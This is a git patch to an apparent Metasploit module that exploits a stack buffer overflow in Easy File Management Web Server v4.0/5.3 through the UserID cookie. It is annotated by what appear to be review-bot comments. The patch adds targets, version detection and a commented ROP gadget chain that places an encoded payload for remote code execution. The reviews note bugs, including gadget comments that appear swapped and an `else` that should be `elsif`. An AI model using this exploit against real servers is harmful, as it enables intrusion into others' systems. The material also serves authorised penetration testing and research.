From f1382af018a86a6a03f67bf499e64226ea4fc6d8 Mon Sep 17 00:00:00 2001
From: TecR0c
Date: Wed, 11 Jun 2014 06:20:49 -0700
Subject: [PATCH] Added target 4.0 and cleaned up exploit
---
 .../windows/http/efs_fmws_userid_bof.rb | 100 ++++++++++++------
 1 file changed, 68 insertions(+), 32 deletions(-)
diff --git a/modules/exploits/windows/http/efs_fmws_userid_bof.rb b/modules/exploits/windows/http/efs_fmws_userid_bof.rb
index 234735fdfa..86c03c525f 100644
--- a/modules/exploits/windows/http/efs_fmws_userid_bof.rb
+++ b/modules/exploits/windows/http/efs_fmws_userid_bof.rb
@@ -12,12 +12,16 @@ class Metasploit3 < Msf::Exploit::Remote
   def initialize(info = {})
     super(update_info(info,
-      'Name' => 'Easy File Management Web Server v5.3 Stack Buffer Overflow',
+      'Name' => 'Easy File Management Web Server v4.0/5.3 Stack Buffer Overflow',
       'Description' => %q{
         Easy File Management Web Server contains a stack buffer overflow condition that is triggered as user-supplied input is not properly
-        validated when handling the User ID cookie. This may allow a remote
+        validated when handling the UserID cookie. This may allow a remote
         attacker to execute arbitrary code.
+
+        This version exploits:
+        Easy File Management Web Server v4.0
+        Easy File Management Web Server v5.3
       },
       'Author' => [
@@ -48,12 +52,17 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Targets' => [
-        # Successfully tested efmws.exe (5.3.0.0) on:
+        # Successfully tested efmws.exe (4.0.0.0) / (5.3.0.0) on:
         # -- Microsoft Windows XP [Version 5.1.2600]
         # -- Microsoft Windows [Version 6.1.7600]
         # -- Microsoft Windows [Version 6.3.9600]
-        [ 'efmws 5.3 Windows Universal', { 'Ret' => 0x10010101 } ]
-        # PPR from ImageLoad.dll
+        ['Automatic Targeting', { 'auto' => true }],
+        ['Efmws 5.3 Universal', { 'Esp' => 0xA445ABCF, 'Ret' => 0x10010101 }],
+        ['Efmws 4.0 Universal', { 'Esp' => 0xA4518472, 'Ret' => 0x10010101 }],
+        # 0x10010101 = pop ebx > pop ecx > retn
+        # 0xA445ABCF = 0x514CF5 push esp > retn 0c
+        # 0xA4518472 = 0x457452 jmp esp
+        # From ImageLoad.dll
       ],
       'DisclosureDate' => 'May 20 2014',
       'DefaultTarget' => 0))
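Review bot: The two `# 0x... = 0x...` comments added under the target list do not agree with the gadget chain that consumes the 'Esp' value in the `exploit` hunk: eax is loaded from the popped 'Esp' value and then passed through `add eax,5bffc883`, and 0xA445ABCF + 0x5BFFC883 wraps to 0x00457452 while 0xA4518472 + 0x5BFFC883 wraps to 0x00514CF5, so the decoded addresses appear swapped relative to the entries they describe (the removed comment "Opcode 'JMP ESP' only existed in V5.3" also paired 0xA445ABCF, the 5.3 value, with jmp esp). Recheck the pairing and put each comment beside the entry it documents, e.g. `['Efmws 5.3 Universal', { 'Esp' => 0xA445ABCF, 'Ret' => 0x10010101 }], # 'Esp' is pre-encoded for the add eax,5bffc883 gadget`. Separately, `'auto' => true` is never read — the automatic branch in `exploit` is chosen by `target.name =~ /Automatic/`, so renaming this entry would silently disable detection; test `target['auto']` instead.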
@@ -64,26 +73,40 @@ class Metasploit3 < Msf::Exploit::Remote
       ], self.class)
   end
-  def check
+  def get_version
     #
     # NOTE: Version 5.3 still reports "4.0" in the "Server" header
     # #if target.name =~ /Automatic/
     res = send_request_raw 'uri' => '/whatsnew.txt'
-    unless res
+    if res and res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
+      version = $1
+      vprint_status "#{peer} - Found version: #{version}"
+      return version
+    elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/
+      version = $1
+      vprint_status "#{peer} - Based on Server header: #{version}"
+      return version
+    else
+      fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
+    end
+    #end
+  end
+
+  def check
+
+    version = get_version
+    unless version
       vprint_status "#{peer} - No response to request"
       return Exploit::CheckCode::Unknown
     end
-    if res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
-      version = "#{$1}"
-      vprint_status "#{peer} - Found version: #{version}"
-      if version == "5.3"
-        return Exploit::CheckCode::Appears
-      end
+    if version == "5.3"
+      return Exploit::CheckCode::Appears
     end
-    if res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/
-      return Exploit::CheckCode::Detected
+    if version == "4.0"
+      return Exploit::CheckCode::Appears
     end
     Exploit::CheckCode::Safe
   end
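Review bot: `get_version` crashes on a nil response: when `send_request_raw` returns nil the `if res and res.body =~ …` test is false and control falls into `elsif res.headers['server'] =~ …`, which raises NoMethodError on nil, while the `else` branch calls `fail_with`, so the method never returns nil and the `unless version` / `CheckCode::Unknown` branch in `check` is unreachable. Add `return nil unless res` before the `if`, drop `res and` from the condition, and replace the `fail_with(...)` with `nil` so that `check` keeps its contract of returning a CheckCode and only `exploit` decides to abort. Use `&&` rather than `and` in the condition, and remove the commented-out `#if target.name =~ /Automatic/` / `#end` lines rather than leaving them in. The two identical `if version == …` branches in `check` could collapse to `return Exploit::CheckCode::Appears if %w[4.0 5.3].include?(version)`.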
@@ -91,29 +114,42 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     #
-    # Check if target doesn't appear to be vulnerable, if so exit
-    # NOTE: if reported as detected continue incase whatsnew.txt is not reachable
+    # Get target version to determine how to reach call/jmp esp
     #
-    unless check == Exploit::CheckCode::Appears || Exploit::CheckCode::Detected
-      fail_with(Failure::NoTarget, "#{peer} - Target does not appear to be running fmws 5.3")
+    if target.name =~ /Automatic/
+      version = get_version
+      if version =~ /5\.3/
+        my_target = targets[1]
+      else version =~ /4\.0/
+        my_target = targets[2]
+      end
+    else
+      my_target = target
     end
     #
-    # Fu to JMP ESP where payload lives
-    # NOTE: Opcode 'JMP ESP' only existed in V5.3
+    # Check if target appears to be vulnerable, if not exit
     #
-    sploit = rand_text(80)
-    sploit << [0x1001D8C8].pack("V")
-    sploit << rand_text(280)
-    sploit << [target.ret].pack("V")
-    sploit << [0xA445ABCF].pack("V")
-    sploit << [0x10010125].pack("V")
-    sploit << [0x10022AAC].pack("V")
-    sploit << rand_text(8)
-    sploit << [0x1001A187].pack("V")
-    sploit << [0x1002466D].pack("V")
+    unless check == Exploit::CheckCode::Appears || check == Exploit::CheckCode::Detected
+      fail_with(Failure::NoTarget, "#{peer} - Target does not appear to be running fmws v4.0/5.3")
+    end
+
+    #
+    # Fu to reach where payload lives
+    #
+
+    sploit = rand_text(80) # Junk
+    sploit << [0x1001D8C8].pack("V") # Push edx
+    sploit << rand_text(280) # Junk
+    sploit << [my_target.ret].pack("V") # Pop ebx > pop ecx > retn
+    sploit << [my_target['Esp']].pack("V") # Setup call/jmp esp
+    sploit << [0x10010125].pack("V") # Contains 00000000 to pass the jnz instruction
+    sploit << [0x10022AAC].pack("V") # Mov eax,ebx > pop esi > pop ebx > retn
+    sploit << rand_text(8) # Filler
+    sploit << [0x1001A187].pack("V") # Add eax,5bffc883 > retn
+    sploit << [0x1002466D].pack("V") # Push eax > retn
     sploit << payload.encoded
     print_status "#{peer} - Trying target #{target.name}..."
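Review bot: `else version =~ /4\.0/` is a plain `else` followed by an expression, not a second condition: the match result is evaluated and discarded, so every version other than 5.3 — including one that is neither 4.0 nor 5.3 — is assigned `targets[2]` and sent the 4.0 chain. Change it to `elsif version =~ /4\.0/` and add `else` / `fail_with(Failure::NoTarget, "#{peer} - Unsupported version #{version}")` so an unrecognised version aborts. The guard below calls `check` twice (`check == … || check == …`), each call running `get_version` and another request on top of the one already made above; store the result in a local once, and note that `check` in this revision never returns `Detected`, so that half of the condition is dead. `print_status` reports `target.name`, which is 'Automatic Targeting' in the auto case — use `my_target.name`. The `targets[1]` / `targets[2]` indices are coupled to the order of the 'Targets' array; selecting by name (`targets.find { |t| t.name =~ /5\.3/ }`) survives reordering. The `exploit` body continues past the end of the hunk.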
@@ -125,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path),
       'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;",
-    }, 5)
+    }, 1)
   end
 end
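Review bot: The timeout argument to `send_request_cgi` drops from 5 to 1 with nothing recording why, so a reader cannot tell whether the change is deliberate or a typo. If the intent is that the server is not expected to answer once the overflow fires, say so on the call, e.g. `# short timeout: no reply is expected once the UserID overflow fires`, or name the value (`timeout = 1`) so its meaning is visible at the call site. If a non-vulnerable server does answer, a one-second window may also be too short to read its response, so the comment should state which trade-off was chosen.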